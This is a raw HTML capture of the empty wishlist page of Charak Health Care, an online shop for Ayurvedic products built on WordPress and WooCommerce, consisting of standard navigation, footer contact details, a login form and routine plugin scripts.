whb-without-border whb-color-light whb-hidden-mobile whb-flex-equal-sides"> <div class="container"> <div class="whb-flex-row whb-top-bar-inner"> <div class="whb-column whb-col-left whb-visible-lg"> <div id="" class=" wd-social-icons wd-style-colored wd-size-small social-follow wd-shape-circle whb-732rvswky1zyxafgd2q9 color-scheme-dark text-center"> <a rel="noopener noreferrer nofollow" href="https://www.facebook.com/profile.php?id=61588140165104" target="_blank" class=" wd-social-icon social-facebook" aria-label="Facebook social link"> <span class="wd-icon"></span> </a> <a rel="noopener noreferrer nofollow" href="#" target="_blank" class=" wd-social-icon social-twitter" aria-label="X social link"> <span class="wd-icon"></span> </a> <a rel="noopener noreferrer nofollow" href="mailto:?subject=Check%20this%20https://charakhealthcare.in/wishlist/" target="_blank" class=" wd-social-icon social-email" aria-label="Email social link"> <span class="wd-icon"></span> </a> <a rel="noopener noreferrer nofollow" href="https://www.instagram.com/charak_health_care/" target="_blank" class=" wd-social-icon social-instagram" aria-label="Instagram social link"> <span class="wd-icon"></span> </a> <a rel="noopener noreferrer nofollow" href="https://youtube.com/@charak_health_care?si=ovZdgn2VniFlFH7E" target="_blank" class=" wd-social-icon social-youtube" aria-label="YouTube social link"> <span class="wd-icon"></span> </a> <a rel="noopener noreferrer nofollow" href="#" target="_blank" class=" wd-social-icon social-pinterest" aria-label="Pinterest social link"> <span class="wd-icon"></span> </a> </div> </div> <div class="whb-column whb-col-center whb-visible-lg"> <div class="site-logo"> <a href="https://charakhealthcare.in/" class="wd-logo wd-main-logo" rel="home" aria-label="Site logo"> <img src="https://charakhealthcare.in/wp-content/uploads/2025/03/charak.png" alt="Charak Health Care" style="max-width: 265px;" /> </a> </div> </div> <div class="whb-column whb-col-right whb-visible-lg"> <div class="wd-header-my-account wd-tools-element wd-event-hover wd-with-username wd-design-7 wd-account-style-icon login-side-opener whb-4bd80hnqkynhclufce34"> <a href="https://charakhealthcare.in/my-account/" title="My account"> <span class="wd-tools-icon"> </span> <span class="wd-tools-text"> Login / Register </span> </a> </div> <div class="wd-header-wishlist wd-tools-element wd-style-icon wd-with-count wd-design-7 whb-qiemllrrbobwgd93gc3l" title="My Wishlist"> <a href="https://charakhealthcare.in/wishlist/" title="Wishlist products"> <span class="wd-tools-icon"> <span class="wd-tools-count"> 0 </span> </span> <span class="wd-tools-text"> Wishlist </span> </a> </div> <div class="wd-header-cart wd-tools-element wd-design-7 cart-widget-opener wd-style-icon whb-eou2v8wd74fmsfgth6bb"> <a href="https://charakhealthcare.in/cart/" title="Shopping cart"> <span class="wd-tools-icon wd-icon-alt"> <span class="wd-cart-number wd-tools-count">0 <span>items</span></span> </span> <span class="wd-tools-text"> <span class="wd-cart-subtotal"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">₹</span>0.00</bdi></span></span> </span> </a> </div> </div> <div class="whb-column whb-col-mobile whb-hidden-lg whb-empty-column"> </div> </div> </div> </div> <div class="whb-row whb-general-header whb-not-sticky-row whb-with-bg whb-without-border whb-color-light whb-flex-flex-middle"> <div class="container"> <div class="whb-flex-row whb-general-header-inner"> <div class="whb-column whb-col-left whb-visible-lg whb-empty-column"> </div> <div class="whb-column whb-col-center whb-visible-lg"> <div class="wd-header-nav wd-header-main-nav text-center wd-design-1" role="navigation" aria-label="Main navigation"> <ul id="menu-main-menu" class="menu wd-nav wd-nav-main wd-style-underline wd-gap-m"><li id="menu-item-863" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-863 item-level-0 menu-simple-dropdown wd-event-hover" ><a href="/" class="woodmart-nav-link"><span class="nav-link-text">Home</span></a></li> <li id="menu-item-871" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-871 item-level-0 menu-simple-dropdown wd-event-hover" ><a href="/product-category/health-care/" class="woodmart-nav-link"><span class="nav-link-text">Health Care</span></a></li> <li id="menu-item-870" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-870 item-level-0 menu-simple-dropdown wd-event-hover" ><a href="/product-category/personal-care/" class="woodmart-nav-link"><span class="nav-link-text">Personal Care</span></a></li> <li id="menu-item-869" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-869 item-level-0 menu-simple-dropdown wd-event-hover" ><a href="/product-category/skin-care/" class="woodmart-nav-link"><span class="nav-link-text">Skin Care</span></a></li> <li id="menu-item-872" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-872 item-level-0 menu-simple-dropdown wd-event-hover" ><a href="/product-category/home-care/" class="woodmart-nav-link"><span class="nav-link-text">Home Care</span></a></li> <li id="menu-item-873" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-873 item-level-0 menu-simple-dropdown wd-event-hover" ><a href="/product-category/baby-care/" class="woodmart-nav-link"><span class="nav-link-text">Baby Care</span></a></li> <li id="menu-item-1812" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1812 item-level-0 menu-simple-dropdown wd-event-hover" ><a href="/doctors/" class="woodmart-nav-link"><span class="nav-link-text">Doctor’s</span></a></li> <li id="menu-item-877" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-877 item-level-0 menu-simple-dropdown wd-event-hover" ><a href="/contact-us/" class="woodmart-nav-link"><span class="nav-link-text">Contact Us</span></a></li> </ul></div> </div> <div class="whb-column whb-col-right whb-visible-lg whb-empty-column"> </div> <div class="whb-column whb-mobile-left whb-hidden-lg"> <div class="wd-tools-element wd-header-mobile-nav wd-style-icon wd-design-1 whb-e95tfj86trs51oz6udwm"> <a href="#" rel="nofollow" aria-label="Open mobile menu"> <span class="wd-tools-icon"> </span> <span class="wd-tools-text">Menu</span> </a> </div></div> <div class="whb-column whb-mobile-center whb-hidden-lg"> <div class="site-logo"> <a href="https://charakhealthcare.in/" class="wd-logo wd-main-logo" rel="home" aria-label="Site logo"> <img src="https://charakhealthcare.in/wp-content/uploads/2025/03/charak-white.png" alt="Charak Health Care" style="max-width: 150px;" /> </a> </div> </div> <div class="whb-column whb-mobile-right whb-hidden-lg"> <div class="wd-header-my-account wd-tools-element wd-event-hover wd-design-1 wd-account-style-icon login-side-opener whb-094xmnhcorlz9xwc83ta"> <a href="https://charakhealthcare.in/my-account/" title="My account"> <span class="wd-tools-icon"> </span> <span class="wd-tools-text"> Login / Register </span> </a> </div> <div class="wd-header-cart wd-tools-element wd-design-5 cart-widget-opener whb-7il9y92xefrfqr3vju7w"> <a href="https://charakhealthcare.in/cart/" title="Shopping cart"> <span class="wd-tools-icon"> <span class="wd-cart-number wd-tools-count">0 <span>items</span></span> </span> <span class="wd-tools-text"> <span class="wd-cart-subtotal"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">₹</span>0.00</bdi></span></span> </span> </a> </div> </div> </div> </div> </div> </div> </header> <div class="wd-page-content main-page-wrapper"> <div class="wd-page-title page-title page-title-default title-size-small title-design-centered color-scheme-dark" style=""> <div class="container"> <h1 class="entry-title title"> Wishlist </h1> <nav class="wd-breadcrumbs"><span typeof="v:Breadcrumb"><a href="https://charakhealthcare.in/" rel="v:url" property="v:title">Home</a></span><span class="wd-delimiter"></span><span class="wd-last">Wishlist</span></nav> </div> </div> <main class="wd-content-layout content-layout-wrapper container" role="main"> <div class="wd-content-area site-content"> <article id="post-22" class="entry-content post-22 page type-page status-publish hentry"> <div data-elementor-type="wp-page" data-elementor-id="22" class="elementor elementor-22" data-elementor-post-type="page"> <section class="wd-negative-gap elementor-section elementor-top-section elementor-element elementor-element-6fa4caa elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="6fa4caa" data-element_type="section" data-e-type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-0aaca36" data-id="0aaca36" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-b8495e7 elementor-widget elementor-widget-wd_wishlist" data-id="b8495e7" data-element_type="widget" data-e-type="widget" data-widget_type="wd_wishlist.default"> <div class="elementor-widget-container"> <div class=""> <div class="wd-wishlist-content"> <p class="wd-empty-wishlist wd-empty-page"> This wishlist is empty. </p> <div class="wd-empty-page-text"> You don't have any products in the wishlist yet. You will find a lot of interesting products on our "Shop" page. </div> <p class="return-to-shop"> <a class="button" href="https://charakhealthcare.in/shop/"> Return to shop </a> </p> </div> </div> </div> </div> </div> </div> </div> </section> </div> </article> </div> </main> </div> <footer class="wd-footer footer-container color-scheme-dark"> <div class="container main-footer wd-entry-content"> <link rel="stylesheet" id="elementor-post-403-css" href="https://charakhealthcare.in/wp-content/uploads/elementor/css/post-403.css?ver=1779113051" type="text/css" media="all"> <div data-elementor-type="wp-post" data-elementor-id="403" class="elementor elementor-403" data-elementor-post-type="cms_block"> <section class="wd-negative-gap elementor-section elementor-top-section elementor-element elementor-element-a443201 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="a443201" data-element_type="section" data-e-type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-extended"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-53f6cdf" data-id="53f6cdf" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <section class="wd-negative-gap elementor-section elementor-inner-section elementor-element elementor-element-147d4b2 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="147d4b2" data-element_type="section" data-e-type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-4e98f12" data-id="4e98f12" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-feeba07 elementor-widget elementor-widget-image" data-id="feeba07" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img width="318" height="247" src="https://charakhealthcare.in/wp-content/uploads/2025/03/charak.png" class="attachment-full size-full wp-image-1323" alt="" srcset="https://charakhealthcare.in/wp-content/uploads/2025/03/charak.png 318w, https://charakhealthcare.in/wp-content/uploads/2025/03/charak-300x233.png 300w, https://charakhealthcare.in/wp-content/uploads/2025/03/charak-150x117.png 150w" sizes="(max-width: 318px) 100vw, 318px" /> </div> </div> <div class="elementor-element elementor-element-b88b6e2 color-scheme-inherit text-left elementor-widget elementor-widget-text-editor" data-id="b88b6e2" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> We started our journey in 2007 by the help of a group of doctors to provide high-quality,natural and holistic health products rooted in the principles of Ayurveda. </div> </div> <div class="elementor-element elementor-element-971dd61 elementor-shape-circle e-grid-align-left elementor-grid-0 elementor-widget elementor-widget-social-icons" data-id="971dd61" data-element_type="widget" data-e-type="widget" data-widget_type="social-icons.default"> <div class="elementor-widget-container"> <div class="elementor-social-icons-wrapper elementor-grid" role="list"> <span class="elementor-grid-item" role="listitem"> <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook elementor-animation-push elementor-repeater-item-0ae1dc8" target="_blank"> <span class="elementor-screen-only">Facebook</span> <svg aria-hidden="true" class="e-font-icon-svg e-fab-facebook" viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="M504 256C504 119 393 8 256 8S8 119 8 256c0 123.78 90.69 226.38 209.25 245V327.69h-63V256h63v-54.64c0-62.15 37-96.48 93.67-96.48 27.14 0 55.52 4.84 55.52 4.84v61h-31.28c-30.8 0-40.41 19.12-40.41 38.73V256h68.78l-11 71.69h-57.78V501C413.31 482.38 504 379.78 504 256z"></path></svg> </a> </span> <span class="elementor-grid-item" role="listitem"> <a class="elementor-icon elementor-social-icon elementor-social-icon-twitter elementor-animation-push elementor-repeater-item-79ae39c" target="_blank"> <span class="elementor-screen-only">Twitter</span> <svg aria-hidden="true" class="e-font-icon-svg e-fab-twitter" viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="M459.37 151.716c.325 4.548.325 9.097.325 13.645 0 138.72-105.583 298.558-298.558 298.558-59.452 0-114.68-17.219-161.137-47.106 8.447.974 16.568 1.299 25.34 1.299 49.055 0 94.213-16.568 130.274-44.832-46.132-.975-84.792-31.188-98.112-72.772 6.498.974 12.995 1.624 19.818 1.624 9.421 0 18.843-1.3 27.614-3.573-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 13.319-28.264-18.843-46.781-51.005-46.781-87.391 0-19.492 5.197-37.36 14.294-52.954 51.655 63.675 129.3 105.258 216.365 109.807-1.624-7.797-2.599-15.918-2.599-24.04 0-57.828 46.782-104.934 104.934-104.934 30.213 0 57.502 12.67 76.67 33.137 23.715-4.548 46.456-13.32 66.599-25.34-7.798 24.366-24.366 44.833-46.132 57.827 21.117-2.273 41.584-8.122 60.426-16.243-14.292 20.791-32.161 39.308-52.628 54.253z"></path></svg> </a> </span> <span class="elementor-grid-item" role="listitem"> <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-animation-push elementor-repeater-item-d5069d4" target="_blank"> <span class="elementor-screen-only">Youtube</span> <svg aria-hidden="true" class="e-font-icon-svg e-fab-youtube" viewBox="0 0 576 512" xmlns="http://www.w3.org/2000/svg"><path d="M549.655 124.083c-6.281-23.65-24.787-42.276-48.284-48.597C458.781 64 288 64 288 64S117.22 64 74.629 75.486c-23.497 6.322-42.003 24.947-48.284 48.597-11.412 42.867-11.412 132.305-11.412 132.305s0 89.438 11.412 132.305c6.281 23.65 24.787 41.5 48.284 47.821C117.22 448 288 448 288 448s170.78 0 213.371-11.486c23.497-6.321 42.003-24.171 48.284-47.821 11.412-42.867 11.412-132.305 11.412-132.305s0-89.438-11.412-132.305zm-317.51 213.508V175.185l142.739 81.205-142.739 81.201z"></path></svg> </a> </span> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-051a661" data-id="051a661" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-a05d452 elementor-widget-divider--view-line_text elementor-widget-divider--element-align-left elementor-widget elementor-widget-divider" data-id="a05d452" data-element_type="widget" data-e-type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> <span class="elementor-divider__text elementor-divider__element"> Quick Links </span> </span> </div> </div> </div> <div class="elementor-element elementor-element-61258bb elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list" data-id="61258bb" data-element_type="widget" data-e-type="widget" data-widget_type="icon-list.default"> <div class="elementor-widget-container"> <ul class="elementor-icon-list-items"> <li class="elementor-icon-list-item"> <a href="/"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="icon icon-double-angle-pointing-to-right"></i> </span> <span class="elementor-icon-list-text">Home</span> </a> </li> <li class="elementor-icon-list-item"> <a href="/about-us"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="icon icon-double-angle-pointing-to-right"></i> </span> <span class="elementor-icon-list-text">About Us</span> </a> </li> <li class="elementor-icon-list-item"> <a href="/ayurveda"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="icon icon-double-angle-pointing-to-right"></i> </span> <span class="elementor-icon-list-text">Ayurveda</span> </a> </li> <li class="elementor-icon-list-item"> <a href="/constitution-of-human-body"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="icon icon-double-angle-pointing-to-right"></i> </span> <span class="elementor-icon-list-text">Constitution Of 'Human Body'</span> </a> </li> <li class="elementor-icon-list-item"> <a href="/contact-us/"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="icon icon-double-angle-pointing-to-right"></i> </span> <span class="elementor-icon-list-text">Contact Us</span> </a> </li> </ul> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-f2d0289" data-id="f2d0289" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-543b40e elementor-widget-divider--view-line_text elementor-widget-divider--element-align-left elementor-widget elementor-widget-divider" data-id="543b40e" data-element_type="widget" data-e-type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> <span class="elementor-divider__text elementor-divider__element"> Important Links </span> </span> </div> </div> </div> <div class="elementor-element elementor-element-2ca8354 elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list" data-id="2ca8354" data-element_type="widget" data-e-type="widget" data-widget_type="icon-list.default"> <div class="elementor-widget-container"> <ul class="elementor-icon-list-items"> <li class="elementor-icon-list-item"> <a href="#"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="icon icon-double-angle-pointing-to-right"></i> </span> <span class="elementor-icon-list-text">My Account</span> </a> </li> <li class="elementor-icon-list-item"> <a href="#"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="icon icon-double-angle-pointing-to-right"></i> </span> <span class="elementor-icon-list-text">Cart</span> </a> </li> <li class="elementor-icon-list-item"> <a href="#"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="icon icon-double-angle-pointing-to-right"></i> </span> <span class="elementor-icon-list-text">Checkout</span> </a> </li> <li class="elementor-icon-list-item"> <a href="#"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="icon icon-double-angle-pointing-to-right"></i> </span> <span class="elementor-icon-list-text">Wishlist</span> </a> </li> </ul> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-5e3770b" data-id="5e3770b" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-37820f6 elementor-widget-divider--view-line_text elementor-widget-divider--element-align-left elementor-widget elementor-widget-divider" data-id="37820f6" data-element_type="widget" data-e-type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> <span class="elementor-divider__text elementor-divider__element"> Contact us </span> </span> </div> </div> </div> <div class="elementor-element elementor-element-22ef979 elementor-align-start elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list" data-id="22ef979" data-element_type="widget" data-e-type="widget" data-widget_type="icon-list.default"> <div class="elementor-widget-container"> <ul class="elementor-icon-list-items"> <li class="elementor-icon-list-item"> <a href="#"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="icon icon-map-marker1"></i> </span> <span class="elementor-icon-list-text">Gopalgaon , Balasore , Odisha</span> </a> </li> <li class="elementor-icon-list-item"> <a href="tel:%209090592159"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="icon icon-phone-call2"></i> </span> <span class="elementor-icon-list-text">+91-9090592159</span> </a> </li> <li class="elementor-icon-list-item"> <a href="mailto:%20info@charakhealthcare.in"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="icon icon-envelope2"></i> </span> <span class="elementor-icon-list-text">info@charakhealthcare.in</span> </a> </li> </ul> </div> </div> </div> </div> </div> </section> </div> </div> </div> </section> <section class="wd-negative-gap elementor-section elementor-top-section elementor-element elementor-element-14bc663 elementor-section-full_width elementor-section-stretched elementor-section-height-default elementor-section-height-default" data-id="14bc663" data-element_type="section" data-e-type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-narrow"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d55a5eb" data-id="d55a5eb" data-element_type="column" data-e-type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-2f71dc9 elementor-widget elementor-widget-heading" data-id="2f71dc9" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <span class="elementor-heading-title elementor-size-default">©Copyright 2025 Charak Health Care. All rights reserved</span> </div> </div> </div> </div> </div> </section> </div> </div> </footer> </div> <div class="wd-close-side wd-fill"></div> <a href="#" class="scrollToTop" aria-label="Scroll to top button"></a> <div class="mobile-nav wd-side-hidden wd-side-hidden-nav wd-left wd-opener-arrow"><ul id="menu-main-menu-1" class="mobile-pages-menu menu wd-nav wd-nav-mobile wd-layout-dropdown wd-active"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-863 item-level-0" ><a href="/" class="woodmart-nav-link"><span class="nav-link-text">Home</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-871 item-level-0" ><a href="/product-category/health-care/" class="woodmart-nav-link"><span class="nav-link-text">Health Care</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-870 item-level-0" ><a href="/product-category/personal-care/" class="woodmart-nav-link"><span class="nav-link-text">Personal Care</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-869 item-level-0" ><a href="/product-category/skin-care/" class="woodmart-nav-link"><span class="nav-link-text">Skin Care</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-872 item-level-0" ><a href="/product-category/home-care/" class="woodmart-nav-link"><span class="nav-link-text">Home Care</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-873 item-level-0" ><a href="/product-category/baby-care/" class="woodmart-nav-link"><span class="nav-link-text">Baby Care</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1812 item-level-0" ><a href="/doctors/" class="woodmart-nav-link"><span class="nav-link-text">Doctor’s</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-877 item-level-0" ><a href="/contact-us/" class="woodmart-nav-link"><span class="nav-link-text">Contact Us</span></a></li> <li class="menu-item menu-item-wishlist wd-with-icon item-level-0"> <a href="https://charakhealthcare.in/wishlist/" class="woodmart-nav-link"> <span class="nav-link-text">Wishlist</span> </a> </li><li class="menu-item login-side-opener menu-item-account wd-with-icon item-level-0"><a href="https://charakhealthcare.in/my-account/" class="woodmart-nav-link">Login / Register</a></li></ul> </div> <div class="cart-widget-side wd-side-hidden wd-right"> <div class="wd-heading"> <span class="title">Shopping cart</span> <div class="close-side-widget wd-action-btn wd-style-text wd-cross-icon"> <a href="#" rel="nofollow">Close</a> </div> </div> <div class="widget woocommerce widget_shopping_cart"><div class="widget_shopping_cart_content"></div></div> </div> <div class="login-form-side wd-side-hidden woocommerce wd-right"> <div class="wd-heading"> <span class="title">Sign in</span> <div class="close-side-widget wd-action-btn wd-style-text wd-cross-icon"> <a href="#" rel="nofollow">Close</a> </div> </div> <div class="woocommerce-notices-wrapper"></div> <form method="post" class="login woocommerce-form woocommerce-form-login hidden-form " action="https://charakhealthcare.in/my-account/" style="display:none;" > <p class="woocommerce-FormRow woocommerce-FormRow--wide form-row form-row-wide form-row-username"> <label for="username">Username or email address <span class="required" aria-hidden="true">*</span><span class="screen-reader-text">Required</span></label> <input type="text" class="woocommerce-Input woocommerce-Input--text input-text" name="username" id="username" value="" /> </p> <p class="woocommerce-FormRow woocommerce-FormRow--wide form-row form-row-wide form-row-password"> <label for="password">Password <span class="required" aria-hidden="true">*</span><span class="screen-reader-text">Required</span></label> <input class="woocommerce-Input woocommerce-Input--text input-text" type="password" name="password" id="password" autocomplete="current-password" /> </p> <p class="form-row"> <input type="hidden" id="woocommerce-login-nonce" name="woocommerce-login-nonce" value="88195d0110" /><input type="hidden" name="_wp_http_referer" value="/wishlist/" /> <input type="hidden" name="redirect" value="https://charakhealthcare.in/wishlist/" /> <button type="submit" class="button woocommerce-button woocommerce-form-login__submit" name="login" value="Log in">Log in</button> </p> <p class="login-form-footer"> <a href="https://charakhealthcare.in/my-account/lost-password/" class="woocommerce-LostPassword lost_password">Lost your password?</a> <label class="woocommerce-form__label woocommerce-form__label-for-checkbox woocommerce-form-login__rememberme"> <input class="woocommerce-form__input woocommerce-form__input-checkbox" name="rememberme" type="checkbox" value="forever" title="Remember me" aria-label="Remember me" /> <span>Remember me</span> </label> </p> </form> <div class="create-account-question"> <p>No account yet?</p> <a href="https://charakhealthcare.in/my-account/?action=register" class="btn create-account-button">Create an Account</a> </div> </div> <script type="speculationrules"> {"prefetch":[{"source":"document","where":{"and":[{"href_matches":"\/*"},{"not":{"href_matches":["\/wp-*.php","\/wp-admin\/*","\/wp-content\/uploads\/*","\/wp-content\/*","\/wp-content\/plugins\/*","\/wp-content\/themes\/woodmart-child\/*","\/wp-content\/themes\/woodmart\/*","\/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]} </script> <div class="wd-toolbar wd-toolbar-label-show"> <div class="wd-toolbar-shop wd-toolbar-item wd-tools-element"> <a href="https://charakhealthcare.in/shop/"> <span class="wd-tools-icon"></span> <span class="wd-toolbar-label"> Shop </span> </a> </div> <div class="wd-header-wishlist wd-tools-element wd-design-5" title="My wishlist"> <a href="https://charakhealthcare.in/wishlist/"> <span class="wd-tools-icon"> <span class="wd-tools-count"> 0 </span> </span> <span class="wd-toolbar-label"> Wishlist </span> </a> </div> <div class="wd-header-cart wd-tools-element wd-design-5 cart-widget-opener" title="My cart"> <a href="https://charakhealthcare.in/cart/"> <span class="wd-tools-icon"> <span class="wd-cart-number wd-tools-count">0 <span>items</span></span> </span> <span class="wd-toolbar-label"> Cart </span> </a> </div> <div class="wd-header-my-account wd-tools-element wd-style-icon login-side-opener"> <a href="https://charakhealthcare.in/my-account/"> <span class="wd-tools-icon"></span> <span class="wd-toolbar-label"> My account </span> </a> </div> </div> <script> const lazyloadRunObserver = () => { const lazyloadBackgrounds = document.querySelectorAll( `.e-con.e-parent:not(.e-lazyloaded)` ); const lazyloadBackgroundObserver = new IntersectionObserver( ( entries ) => { entries.forEach( ( entry ) => { if ( entry.isIntersecting ) { let lazyloadBackground = entry.target; if( lazyloadBackground ) { lazyloadBackground.classList.add( 'e-lazyloaded' ); } lazyloadBackgroundObserver.unobserve( entry.target ); } }); }, { rootMargin: '200px 0px 200px 0px' } ); lazyloadBackgrounds.forEach( ( lazyloadBackground ) => { lazyloadBackgroundObserver.observe( lazyloadBackground ); } ); }; const events = [ 'DOMContentLoaded', 'elementor/lazyload/observe', ]; events.forEach( ( event ) => { document.addEventListener( event, lazyloadRunObserver ); } ); </script> <script type='text/javascript'> (function () { var c = document.body.className; c = c.replace(/woocommerce-no-js/, 'woocommerce-js'); document.body.className = c; })(); </script> <link rel='stylesheet' id='wc-blocks-style-css' href='https://charakhealthcare.in/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=wc-10.7.0' type='text/css' media='all' /> <link rel='stylesheet' id='widget-image-css' href='https://charakhealthcare.in/wp-content/plugins/elementor/assets/css/widget-image.min.css?ver=4.1.0-dev1' type='text/css' media='all' /> <link rel='stylesheet' id='e-animation-push-css' href='https://charakhealthcare.in/wp-content/plugins/elementor/assets/lib/animations/styles/e-animation-push.min.css?ver=4.1.0-dev1' type='text/css' media='all' /> <link rel='stylesheet' id='widget-social-icons-css' href='https://charakhealthcare.in/wp-content/plugins/elementor/assets/css/widget-social-icons.min.css?ver=4.1.0-dev1' type='text/css' media='all' /> <link rel='stylesheet' id='e-apple-webkit-css' href='https://charakhealthcare.in/wp-content/uploads/elementor/css/custom-apple-webkit.min.css?ver=1779113054' type='text/css' media='all' /> <link rel='stylesheet' id='widget-divider-css' href='https://charakhealthcare.in/wp-content/plugins/elementor/assets/css/widget-divider.min.css?ver=4.1.0-dev1' type='text/css' media='all' /> <link rel='stylesheet' id='widget-icon-list-css' href='https://charakhealthcare.in/wp-content/uploads/elementor/css/custom-widget-icon-list.min.css?ver=1779113051' type='text/css' media='all' /> <link rel='stylesheet' id='widget-heading-css' href='https://charakhealthcare.in/wp-content/plugins/elementor/assets/css/widget-heading.min.css?ver=4.1.0-dev1' type='text/css' media='all' /> <script type="text/javascript" id="wd-update-cart-fragments-fix-js-extra"> /* <![CDATA[ */ var wd_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_bf53890a23063d9de322dc7303394660","fragment_name":"wc_fragments_bf53890a23063d9de322dc7303394660","request_timeout":"5000"}; /* ]]> */ </script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/themes/woodmart/js/scripts/wc/updateCartFragmentsFix.js?ver=8.0.6" id="wd-update-cart-fragments-fix-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/elementskit-lite/widgets/init/assets/js/widget-scripts.js?ver=3.9.3" id="ekit-widget-scripts-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6" id="wp-hooks-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6" id="wp-i18n-js"></script> <script type="text/javascript" id="wp-i18n-js-after"> /* <![CDATA[ */ wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } ); /* ]]> */ </script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.1.6" id="swv-js"></script> <script type="text/javascript" id="contact-form-7-js-before"> /* <![CDATA[ */ var wpcf7 = { "api": { "root": "https:\/\/charakhealthcare.in\/wp-json\/", "namespace": "contact-form-7\/v1" } }; /* ]]> */ </script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.1.6" id="contact-form-7-js"></script> <script type="text/javascript" src="https://charakhealthcare.in/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=10.7.0" id="sourcebuster-js-js"></script> <script type="text/javascript" id="wc-order-attribution-js-extra"> /* <![CDATA[ */ var wc_order_attribution = 